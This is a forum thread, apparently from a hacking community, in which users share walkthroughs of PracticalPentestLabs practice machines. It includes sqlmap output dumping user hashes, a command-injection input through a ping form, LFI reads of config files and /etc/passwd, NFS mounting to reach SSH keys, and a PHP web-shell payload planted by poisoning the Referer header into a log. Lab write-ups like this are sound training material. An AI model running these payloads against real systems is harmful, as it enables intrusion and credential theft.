Much appreciated Mr Rick ! 
I never heard it. Thanks a lot
Thanks for the share! I just saw that ‘HAGINI’ and got command execution on it already, but i don’t know what to do with it, nothing to read 
Awesome, @exploit … yeah there isn’t a flag submission system there, they are working on it as per their latest tweet
Can you write a small walk-through on how you did "HIGINI" ?We know the current UI and website interface are crappy, we are working on something new. In the meantime you can still join and practice
— PracticalPentestLabs (@ppentestlabs) June 10, 2017
1 Like
HOSTNAME:C3PO
IP:10.0.1.6
I Found a SQLi in the Search Box
http://10.0.1.6/inc/search.php?query=xxx
By adding the single quotes you’ll get the Error message
I used SQLMap For Quick and Fast injection
as you see 3 types of injection …
Anyway
select table_name FROM information_schema.tables where table_schema='vuln' [13]:
[*] adrbook
[*] eshop_goods
[*] eshop_orders
[*] flashgames
[*] log
[*] messages
[*] provozovny
[*] review_answers
[*] review_category
[*] review_questions
[*] statistics
[*] tickets
[*] users
select column_name from information_schema.columns where table_name='users' [10]:
[*] alterpass
[*] heslo
[*] id
[*] image
[*] isadmin
[*] login
[*] nick
[*] remail
[*] secondmail
[*] telefon
SELECT id,login,heslo,isadmin FROM users [13]:
[*] 1, karel, f196c5c9a5f002d14cfc2aafce74e39b, 0
[*] 2, jana, 3f858cf8cfd59f25010e71b6b5671428, 0
[*] 12, michal, 955db0b81ef1989b4a4dfeae8061a9a6, 0
[*] 13, Smolicek, 593a90797681ebd0b8c44315a4caf6ff, 0
[*] 14, jezinky, 4475987873e549d5208f8ad743fc3d07, 0
[*] 15, utocnik, 955db0b81ef1989b4a4dfeae8061a9a6, 0
[*] 18, uzivatel, 32250170a0dca92d53ec9624f336ca24, 0
[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1
[*] 23, prochy, 32f055ca38a83ecb670b04edb50016ad, 0
[*] 24, prochy2, 2d8883c2d85b14fdcb44e3b3dc959535, 0
[*] 25, butterfly2, 1adbb3178591fd5bb0c248518f39bf6d, 0
[*] 26, test, 098f6bcd4621d373cade4e832627b4f6, 0
[*] 27, qyqouxmg, ae219661afe50f60419afbe08c45947d, 0
The Only user Have admin privileges is admin himself 
[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1
Login …
go to this option
and as we know The ping option use “system” function or “exec” or … so its clear that this box is vulnerable
Lemme check if its work first let ping the local ip address 127.0.0.1
Okay Cool
To Run many functions you have to use | as separator between them
The PHP code Must be like that
<?php echo system("ping {$_GET['host']}"); ?>So Let’s Try to send this Request
127.0.0.1|uname -a
Works Fine
Whatever …
I Tried to upload a PHP Shell using “wget” but nothing …
I Read some PHP Files using “cat” command
That lead me to the config file named “base.php”
// .... PHP code
$mysqlServer = 'localhost';
$mysqlUser = 'vuln';
$mysqlPassword = 'vuln';
$mysqlName = 'vuln';
// .... PHP code
… To Be Continued
2 Likes
Awesome, thank you guys. Looking forward for more
HOSTNAME:TADDEO
IP:10.0.3.10
Let’s add “name” as a parameter to our request
Nothing shown ! let’s add phpinfo.php
Looks Like (LFI) Local File Include …
Let’s Read config.php file via PHP Filter
php://filter/convert.base64-encode/resource=config.php
We’ll get base64 code
<?php
define( 'DB_NAME', 'test' );
/** MySQL database username */
define( 'DB_USER', 'taddeo' );
/** MySQL database password */
define( 'DB_PASSWORD', 'taddeo@321' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
?>
This is The Code After Decoding …
Now Let’s Read /etc/passwd FILE
view-source:http://10.0.3.10/file.php?name=/etc/passwd
I’m Trying To upload a PHP Shell
So i’ll update this post if there is anything important or i’ll try to solve another challenge !
1 Like
HOSTNAME:TADDEO
IP:10.0.3.10
Did the same as DamaneDz
Then I used the MySQL user to log in to ssh
Then managed to escalate my privs to root
I did a quick search for the flag but didnt have any luck.
Any ideas?
HOSTNAME: RASIM
IP: 10.0.3.11
Quick nmap scan
Nmap scan report for 10.0.3.11
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
2049/tcp open nfs
I tried to mount the nfs locally
mount 10.0.3.11:/ /test/
After a bit of digging around I found that /home/rasim/ had ssh keys in there.
Haven’t attemped to replace them yet but I am guess that should give us ssh access to the box.
10.0.1.6
Hi,
Should I not be able to ping my attack pc?
I am trying to get a shell but seeing that I am unable to even ping my PC the shell wont connect back or is this part of the challenge?
Thanks
Good job on TADDEO and RASIM I was able to get a shell the same way, although I did find the FLAG in the root/ directory of the host, I think you should check back when the hosts are reverted
10.0.1.6
Hi,
Should I not be able to ping my attack pc?
I am trying to get a shell but seeing that I am unable to even ping
my PC the shell wont connect back or is this part of the challenge?
Thanks
I think it’s part of the challenge, I was able to bypass that though 
There is no hints in the challenges so I thought I have only to exploit them
anyway I solved the first part and you can solve the second
Any hints on how you got root on C3PO?
I have have shell and I thought the overlayfs exploit might I couldn’t seem to get it to work. I also tried a few others and they just seemed to crash the server 
@h4x0r: Imagine me and 2-3 other folks tackling picoCTF, which lasts for 2 weeks, on the forum. It’d be much more convenient if you just hang out on IRC and at the same you won’t be shading other posts.
I agree with @_py. The IRC is the ultimate place for figuring stuff out and solving problems. The forum is a place for discussion, perhaps writeups, how you did it, or one or two issues you may be facing. But a conversation about breaking it, that is a job for the IRC.
If you have ever used Facebook, would you have a conversation in the comment section? That is what this may be like.
3 Likes
Just knocked over HIGINI if anyone is interested.
This is basically the approach I took step by step:
- nmap -> find ports 22+80
- View source -> find creds ‘test’ and ‘test’. Enter creds but they don’t go far. Some page called ‘expenses.php’ which doesn’t exist (useful later )
- Hit up ‘/robots.txt’. Find /dev.
- Download pages -> note obvious LFI from the ‘users’ cookie. Guess that the same pages in /dev are available in /. Test with …/…/…/…/etc/passwd as the user cookie and the LFI works
- Using the path /proc/self/fd/2 shows the error log. Note the instance of the ‘referer’ header being written out - particularly when the expenses.php file can’t be found
- Login in again but this time polluting the referer header with the <?php echo('thisworks!'); system($_GET['cmd']); ?> string set.
- Reroll the 5th step - note the ‘thisworks!’ string being printed.
- Passing in cmd=ls as the query yields RCE.
DB credentials can be found at this point.
Don’t see obvious privesc yet.
I’m glad you gave 0 fucks about the 2 comments above.
5 Likes